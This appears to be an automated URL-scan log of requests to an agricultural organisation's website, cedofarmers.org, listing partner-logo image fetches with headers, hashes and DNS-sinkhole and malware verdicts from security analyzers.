Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 06 Nov 2020 09:50:06 GMT
accept-ranges: bytes
content-length: 17630
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226182-nutreal_logo.png
192.185.57.117200 OK 18 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226182-nutreal_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 314 x 133, 8-bit/color RGBA, non-interlaced\012- data
Hash 1d0e4e690cd2fb73a223791f6927df16
806f6fdca255063da5403e63f947f44cf5918fa0
cabeb13a9695700c0597e6b33b223fce17a698ba5409637fb76489234d8f4f2e
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226182-nutreal_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:02 GMT
accept-ranges: bytes
content-length: 17488
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226145-mamedicot_logo.jpg
192.185.57.117200 OK 17 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226145-mamedicot_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 319x170, components 3\012- data
Hash f17dffa45410e3b7055e9b5c42db9887
c25736b1ff2d855ae9b667333c1265fd3ec7fb82
427e42a5cc5181d1b1ac27bec35c139578d4b3989cc4570a1c7aa147d6a34f8d
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226145-mamedicot_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:24 GMT
accept-ranges: bytes
content-length: 16992
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226099-idrc_logo.png
192.185.57.117200 OK 19 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226099-idrc_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 600 x 138, 8-bit/color RGBA, non-interlaced\012- data
Hash b84e72d2691312625aec39da7e26b1c8
512d979aaafcb147e8da1ff27a202c83ce904690
f3630581290816968d46650aa3a4e6b87dd96cac7eb5ccf9ca513a7461c8f19f
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226099-idrc_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:38 GMT
accept-ranges: bytes
content-length: 18864
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604667043-GAC.jpg
192.185.57.117200 OK 18 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604667043-GAC.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 782x84, components 3\012- data
Hash 68860c558193b9c06ad87590544260c8
9301bb291f1b44834fa4e2b80b3ced0828fac9cc
d12bb2d859f25717a11a9f2bbed1f9659713ec98177e9743515a9ad759ba32ba
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604667043-GAC.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 06 Nov 2020 09:50:44 GMT
accept-ranges: bytes
content-length: 18426
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226170-naccri_logo.gif
192.185.57.117200 OK 23 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226170-naccri_logo.gif
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type GIF image data, version 89a, 363 x 215\012- data
Hash b1518cc05cd30d01c564d7b805477fcd
37befe6a7ee22438729b40c59e1b60883e70a493
6512e90f7eb83d3cb1cfcb5feaf0daf69d224a70ca18e1a1ea528223f1fd9797
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226170-naccri_logo.gif HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:50 GMT
accept-ranges: bytes
content-length: 22584
content-type: image/gif
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226177-NARO_logo.png
192.185.57.117200 OK 22 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226177-NARO_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 110 x 115, 8-bit/color RGBA, non-interlaced\012- data
Hash d88ead51d157daeb14f1fa4bef294888
3257637eccca18810f172d4b659d288c4b2565d6
b17ae365c55ef7ded5aa0a72cc42a8ce2c3330cae2d68f14b7af8e1f40ad4ba5
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226177-NARO_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:56 GMT
accept-ranges: bytes
content-length: 22156
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226042-CIAT_logo.png
192.185.57.117200 OK 26 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226042-CIAT_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 546 x 262, 8-bit/color RGBA, non-interlaced\012- data
Hash fa6fbaa6375ea882f3ed89b9873c54ef
6be564842ac991e86873875fbdbc5fe38d6d4f62
295dfb343ff16792b8e1c59a47ccbf77fde7a4481dcd2b78ca13a3a033a1ce3f
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226042-CIAT_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:42 GMT
accept-ranges: bytes
content-length: 26151
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226242-unihoffen_logo.png
192.185.57.117200 OK 32 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226242-unihoffen_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 1200 x 630, 8-bit/color RGBA, non-interlaced\012- data
Hash 274488a5926f3abd2d033b657a1ca661
cb36c76e5a984a14ea5098fbb46b15e390560cd0
c28e456d7421c182180b7e0b04d8813609cf9abaf30e44c5dd4cfb790420aa94
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226242-unihoffen_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:24:02 GMT
accept-ranges: bytes
content-length: 31987
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/google-map.js
192.185.57.117404 Not Found 2.4 kB URL HTTP/2 cedofarmers.org/js/google-map.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (5395)
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/google-map.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 404 Not Found
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:42 GMT
vary: Accept-Encoding
content-encoding: gzip
content-length: 2401
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226009-aciar_logo.png
192.185.57.117200 OK 24 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226009-aciar_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 300 x 74, 8-bit/color RGBA, non-interlaced\012- data
Hash 77445a24baf789dc455d546e9a648f27
4110ca088be4f164d509a845083e32006bdf8bf1
e87872696cbc1b239bcd07500d471f14decdb8b5b06f1f405c83fcac4a86f1dd
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226009-aciar_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:08 GMT
accept-ranges: bytes
content-length: 24150
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/ckuploads/files/background1(1).jpg
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/ckuploads/files/background1(1).jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /ckuploads/files/background1(1).jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
